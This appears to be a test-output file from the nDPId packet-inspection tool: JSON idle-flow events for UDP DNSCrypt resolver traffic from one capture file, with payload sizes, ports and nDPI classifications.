-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312130,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396210,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":54375,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396108,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":50277,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317428,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396110,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":44161,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318062,"flow_idle_time":180000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304818,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381021,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":51826,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396218,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348803,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304627,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380844,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317810,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318205,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":40209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304399,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318167,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":51935,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":49186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317822,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52069,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312400,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337076,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311314,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402187,"flow_last_seen":946739402352,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318171,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":54096,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":36676,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396073,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311310,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304361,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
